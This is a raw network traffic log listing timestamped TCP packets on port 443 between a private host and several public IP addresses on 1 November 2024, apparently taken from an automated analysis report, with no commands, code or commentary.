Nov 1, 2024 20:58:19.307457924 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.331167936 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.331182003 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.361216068 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.361608982 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.361624002 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.362008095 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.362411976 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.362510920 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.362521887 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.362529993 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.363085985 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.363099098 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.380125046 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.408185005 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.408222914 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.408379078 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.410976887 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.426175117 CET	51862	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.426184893 CET	443	51862	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.463108063 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.463149071 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.463262081 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.463658094 CET	60483	443	192.168.11.20	52.223.22.214
Nov 1, 2024 20:58:19.463670969 CET	443	60483	52.223.22.214	192.168.11.20
Nov 1, 2024 20:58:19.491410017 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.491424084 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.491553068 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.491841078 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.491846085 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.524076939 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.524091005 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.524209023 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.524491072 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.524501085 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.593969107 CET	56718	443	192.168.11.20	172.64.41.3
Nov 1, 2024 20:58:19.593977928 CET	443	56718	172.64.41.3	192.168.11.20
Nov 1, 2024 20:58:19.606769085 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.606797934 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.607198000 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.626986980 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.626996994 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:19.627120972 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.627373934 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.627377987 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:19.646294117 CET	61694	443	192.168.11.20	68.67.179.153
Nov 1, 2024 20:58:19.646303892 CET	443	61694	68.67.179.153	192.168.11.20
Nov 1, 2024 20:58:19.719396114 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.719711065 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.719717979 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.720431089 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.720733881 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.727936983 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.728029013 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.728241920 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.744040012 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.744055986 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.744415045 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.744976044 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:19.744982004 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:19.772023916 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.781722069 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.781727076 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:19.804625034 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.804692030 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.804924011 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.805382967 CET	53018	443	192.168.11.20	35.213.89.133
Nov 1, 2024 20:58:19.805392981 CET	443	53018	35.213.89.133	192.168.11.20
Nov 1, 2024 20:58:19.808639050 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.809030056 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.809039116 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.809336901 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.809771061 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.809845924 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.809850931 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.809860945 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.828882933 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:19.859916925 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.861460924 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.861584902 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.862427950 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.862432957 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.863286972 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.863291025 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.863337994 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.863342047 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.863385916 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:19.863389015 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:19.906933069 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.907093048 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.907346010 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.908055067 CET	54940	443	192.168.11.20	68.67.161.208
Nov 1, 2024 20:58:19.908063889 CET	443	54940	68.67.161.208	192.168.11.20
Nov 1, 2024 20:58:19.918255091 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.918267965 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:19.918445110 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.918736935 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:19.918746948 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.031739950 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.032079935 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.032084942 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.032481909 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.032856941 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.032946110 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.033015013 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.075959921 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.078598976 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.122040033 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.122366905 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.122375011 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.122669935 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.123105049 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123192072 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.123224020 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123289108 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123294115 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.123339891 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123389006 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.123430967 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123476982 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.123621941 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.123684883 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.129334927 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.129369974 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.129529953 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.130455017 CET	60191	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.130464077 CET	443	60191	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.131141901 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.131158113 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.131400108 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.131720066 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.131728888 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.321361065 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.321773052 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.321787119 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.322146893 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.322559118 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.322648048 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.322658062 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.367961884 CET	443	49793	68.67.179.155	192.168.11.20
Nov 1, 2024 20:58:20.376218081 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.387135983 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:20.387165070 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:20.387279034 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:20.389348984 CET	56540	443	192.168.11.20	172.241.51.69
Nov 1, 2024 20:58:20.389357090 CET	443	56540	172.241.51.69	192.168.11.20
Nov 1, 2024 20:58:20.450104952 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.450139999 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.450256109 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.450527906 CET	49838	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.450534105 CET	443	49838	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.479939938 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.480226040 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.480237007 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.480518103 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.480885029 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.480971098 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.480984926 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.481071949 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.481082916 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.481090069 CET	443	51447	20.189.173.1	192.168.11.20
Nov 1, 2024 20:58:20.524581909 CET	51447	443	192.168.11.20	20.189.173.1
Nov 1, 2024 20:58:20.543771982 CET	49793	443	192.168.11.20	68.67.179.155
Nov 1, 2024 20:58:20.613116980 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:20.613146067 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:20.613267899 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:20.613876104 CET	62018	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:20.613883972 CET	443	62018	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:20.639903069 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:20.639915943 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:20.640059948 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:20.640294075 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:20.640300989 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.009670019 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.009836912 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.010215044 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.010219097 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.011472940 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.011477947 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.685956001 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.685972929 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.686122894 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.686310053 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.686319113 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.794280052 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.794341087 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:21.794509888 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.794998884 CET	58983	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:21.795006037 CET	443	58983	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.055442095 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.055651903 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:22.056001902 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:22.056025028 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.057250023 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:22.057256937 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.841893911 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.841955900 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:22.842104912 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:22.843211889 CET	58984	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:22.843225002 CET	443	58984	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:23.284578085 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.284601927 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:23.284794092 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.285043001 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.285053968 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:23.657757044 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:23.657902956 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.658251047 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.658294916 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:23.659578085 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:23.659621954 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.254280090 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.254296064 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.254348993 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.254398108 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254447937 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254447937 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254477978 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.254503965 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254503965 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254739046 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254739046 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.254930019 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339283943 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.339339018 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.339459896 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339459896 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339459896 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339675903 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339677095 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.339734077 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.339874983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.458281040 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.458338976 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.458514929 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.458695889 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.458730936 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.458883047 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.539071083 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.539128065 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.539282084 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.539282084 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.539410114 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.539462090 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.539592028 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.539772987 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.601802111 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.601857901 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.602024078 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.602200985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.602200985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.602200985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.602200985 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.602267981 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.602456093 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.646729946 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.646787882 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.646949053 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.646949053 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.646949053 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.647016048 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.647124052 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.647124052 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.647346973 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.683130980 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.683186054 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.683527946 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.683527946 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.683527946 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.683584929 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.683896065 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.716547966 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.716603994 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.716809034 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.716809034 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.716869116 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.716964960 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.716964960 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.717135906 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.751611948 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.751667023 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.751975060 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.751975060 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.752038956 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.752207041 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.787127972 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.787184000 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.787333012 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.787333012 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.787333012 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.787395000 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.787419081 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.787648916 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.817648888 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.817703009 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.817869902 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.818087101 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.818137884 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.818326950 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.838785887 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.838845015 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.839277029 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839277983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839277983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839277983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839277983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839277983 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.839351892 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.839607000 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859653950 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.859708071 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.859819889 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859819889 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859870911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859870911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859870911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859870911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859870911 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.859913111 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.860061884 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.860061884 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.877286911 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.877345085 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.877527952 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.877583981 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.877624989 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.877624989 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.877624989 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.877830029 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.896486998 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.896543980 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.896656990 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.896656990 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.896872997 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.896872997 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.896927118 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.897028923 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.897125959 CET	58985	443	192.168.11.20	188.245.203.37
Nov 1, 2024 20:58:24.911973000 CET	443	58985	188.245.203.37	192.168.11.20
Nov 1, 2024 20:58:24.912067890 CET	443	58985	188.245.203.37	192.168.11.20
